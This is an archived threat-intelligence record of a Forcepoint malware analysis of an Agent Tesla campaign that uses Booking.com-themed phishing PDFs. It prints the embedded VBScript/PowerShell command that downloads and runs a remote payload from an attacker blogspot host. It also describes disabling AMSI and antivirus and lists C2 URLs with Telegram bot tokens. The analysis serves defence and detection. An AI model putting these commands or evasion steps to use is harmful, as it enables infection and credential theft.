{
	"id": "06c8766d-7aa1-4f94-9bd3-cc96f3338744",
	"created_at": "2026-04-06T00:22:19.596483Z",
	"updated_at": "2026-04-10T03:20:29.871253Z",
	"deleted_at": null,
	"sha1_hash": "9f28f99f61e256211d0df86e5bf690d51237e443",
	"title": "Online Travelers at Risk: Agent Tesla Malware Attacks Travel Industry",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1277149,
	"plain_text": "Online Travelers at Risk: Agent Tesla Malware Attacks Travel Industry\r\nBy Mayur Sewani\r\nPublished: 2024-02-26 · Archived: 2026-04-05 22:57:17 UTC\r\nToday we look at a similar campaign, delivered via email as a PDF attachment, which ends up downloading a RAT and leaving the system infected.\r\nThe email is an example of scamming and brand impersonation: the sender is seeking a refund for a reservation made at Booking.com and asks the recipient to check the attached PDF for the card statement. Fig. 1 shows the email containing the PDF attachment.\r\nExecution chain\r\nAnalyzing malicious PDF\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 1 of 11\r\nWe can dig into the attached PDF to find attributes generally used by malicious actors. Here we first statically analyze the PDF using PDFiD, which scans the file for certain PDF keywords and lets us identify malicious PDF contents.\r\nIn Fig. 1, we can see the PDF contains 7 obj, 7 endobj, 5 stream, and 1 ObjStm entries.\r\nFurther, we can use pdf-parser to view the content of the PDF. In this case, we’ll focus on the /ObjStm, which generally hides scripts and URLs.\r\nThe ObjStm from this file contains a script and an embedded URL, shown in Fig. 2:\r\nWe can also use PDFStreamDumper to check object streams:\r\nFrom the objects in the PDF, we can see it uses two different methods to download the next-stage payload:\r\n1. User click on a fake pop-up message: the Action URL in the PDF [/URI/Type /Action/URI (hxxps://bit[.]ly/newbookingupdates)] connects to the malicious URL hxxps://bit[.]ly/newbookingupdates and then redirects to hxxps://bio0king[.]blogspot[.]com/ to download the next-stage JavaScript payload.\r\n2. In parallel, it has embedded VBScript ExecuteGlobal code (or, in some files, JavaScript code) to directly download the final-stage remote PowerShell payload.\r\nCode: ”\u003c(vbscript:ExecuteGlobal\\(\"CreateObject\\(\"\"WScript.Shell\"\"\\).Run\"\"powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$\\(irm htloctmain25[.]blogspot[.]com//////////////atom.xml\\) | . \\('i*\u0026*\u0026\u0026*x'\\).replace\\('*\u0026*\u0026\u0026*','e'\\);Start-Sleep -Seconds 5\"\",0:Close\"\\))/F (\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\mshta)\u003e\u003e”\r\nOnce a user clicks the link in the PDF, the URL downloads an obfuscated JavaScript file: Booking.com-1728394029.js\r\nObfuscated JavaScript\r\nIt contains very long name arrays and string concatenation.\r\nOn deobfuscating the JS in Fig. 7, we found it tries to connect to “htloctmain25[.]blogspot.com/////////////////////////atom.xml”, which further redirects to “hxxps://bitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file” to download the next-stage PowerShell payload, invoking PowerShell and later deleting the script.\r\nOn execution, the downloaded PowerShell script uses various techniques, bears strong obfuscation, and drops a .dll file related to the Agent Tesla malware family. Initially it searches for critical system processes [RegSvcs.exe, mshta.exe, Wscript.exe, msbuild.exe] and tries to stop them forcefully.\r\nObfuscation:\r\nThe PowerShell script also contains multiple variables with multi-level binary obfuscation and uses \".replace()\" multiple times to replace special characters like '*', '^' and '-' with binary substrings. It contains a function to convert the resulting binary stream into ASCII text. It uses this obfuscation for defense evasion.\r\nDuring execution it replaces those special characters and then converts the binary stream into ASCII text to form additional PowerShell scripts and the .dll payload, as shown in Fig. 7.1.\r\nIn Fig. 7.2, after de-obfuscating the script, it is found to be modifying the registry: it sets up a CLSID in the registry with the DLL name “C:\\IDontExist.dll”. The registry changes also affect AMSI and disable it by overriding the Microsoft Defender COM objects.\r\nIn Fig. 7.3, we see the script adds exclusions for extensions, paths, and processes in the AV so the malware executes without getting detected. Then it sets preferences and disables security features, executed with admin privileges.\r\nNext, the script makes changes to the registry, services, and firewall using netsh.\r\nAfter dropping the final .dll file, it performs process injection into RegSvcs.exe and MSBuild.exe. This RegSvcs.exe connects to “api[.]ipify[.]org” to get the public IP address of the system, with the goal of stealing credentials and other personal data from web browsers. It then sends the exfiltrated data to a private Telegram chat room.\r\nThe PowerShell script again connects to a different server, “htljan62024[.]blogspot[.]com//////////atom.xml”, and tries to download another similar PowerShell payload with another {random}[.]blogspot[.]com URL for persistence. After performing all the operations, the PowerShell script drops a {random-name}.dll file, executes it and deletes itself.\r\nConclusion:\r\nWe saw Agent Tesla malware activity increase at the start of the pandemic. As hackers have continued to use it in the years since, they keep evolving their techniques and using new tactics for successful delivery and execution. Here, we showed how this campaign delivers the malware by a PDF received via email that impersonates one of the leading travel agencies. The infection process starts with a fake email carrying a booking invoice as a PDF attachment, which leads to the download of malicious JavaScript, which on execution downloads a PowerShell script. The PowerShell script has a sophisticated, multi-stage obfuscation strategy which, on de-obfuscation, is found to perform a series of techniques and load the Agent Tesla malware. On successful infiltration, the malware allows attackers to conduct malicious activities such as data theft and executing commands on compromised systems.\r\nProtection statement\r\nForcepoint customers are protected against this threat at the following stages of attack:\r\nStage 2 (Lure) – Malicious attachments associated with these attacks are identified and blocked.\r\nStage 3 (Redirect) – The redirection to the BlogSpot URL is categorized and blocked under security classification.\r\nStage 5 (Dropper File) – The dropper files are added to the Forcepoint malicious database and are blocked.\r\nStage 6 (Call Home) – Blocked C\u0026C: abused Telegram private chat rooms.\r\nIOCs\r\nSpoofed Senders:\r\nPaola@intel-provider[.]com\r\nbooking[.]com@stellantises[.]com\r\nbooking[.]com@urbanstayshotel[.]com\r\nBooking[.]com@b00king[.]biz\r\nBooking[.]com@bitlabwallets[.]com\r\nBooking[.]com@drokesoftware[.]com\r\nBooking[.]com@generaldistributes[.]com\r\nPDF Hashes\r\nf7c625f1d3581aa9a3fb81bb26c02f17f0a4004e\r\nc82467b08c76b2e7a2239e0e1c7c5df7519316e2\r\n7e031b1513aa65874e9b609d339b084a39036d8f\r\n6d57264a6b55f7769141a6e2f3ce9b1614d76090\r\nJavaScript Hashes\r\na1c7b79e09df8713c22c4b8f228af4869502719a\r\n67ccb505a1e6f3fa18e2a546603f8335d777385b\r\n9907895c521bddd02573ca5e361490f017932dbe\r\nPowerShell Hashes\r\na1919c59ab67de195e2fe3a835204c9f1750f319\r\n83e8d610343f2b57a6f6e4608dec6f030e0760da\r\n9753ef890a63b7195f75b860e255f0b36a830b37\r\nDLL Hashes\r\na7dd09b4087fd620ef59bed5a9c51295b3808c35\r\nffcd7a3a80eb0caf019a6d30297522d49311feec\r\nc441863097e7cab51728656037c01ffa257ffcbf\r\nMalicious URLs\r\nhotelofficeewn[.]blogspot[.]com////////////atom.xml\r\nbo0klng[.]blogspot[.]com/\r\nbit[.]ly/newbookingupdates\r\nbio0king[.]blogspot[.]com/\r\nhtloctmain25[.]blogspot[.]com//////////////atom.xml\r\nbitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file\r\nbooking-c.blogspot[.]com////////atom[.]xml\r\nhtlfeb24[.]blogspot[.]com//////////////////////////////atom.xml\r\nbit[.]ly/newbookingupdate\r\n4c1c6c2c-3624-42cb-a147-0b3263050851[.]usrfiles[.]com/ugd/4c1c6c_a6f8a2e6200e45219ab51d2fea9439ff.txt\r\nC2s\r\nApi[.]telegram[.]org/bot6796626947:AAGohe-IHhj5LD7VpBLcRBukReMwBcOmiTo/sendDocument\r\nApi[.]telegram[.]org/bot6775303908:AAHd23oi4Hfc-xrVIpxaoy_LMKRuUmb2KZM/sendDocument\r\nSource: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry"
	],
	"report_names": [
		"agent-tesla-malware-attacks-travel-industry"
	],
	"threat_actors": [],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.pdf",
		"text": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.txt",
		"img": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.jpg"
	}
}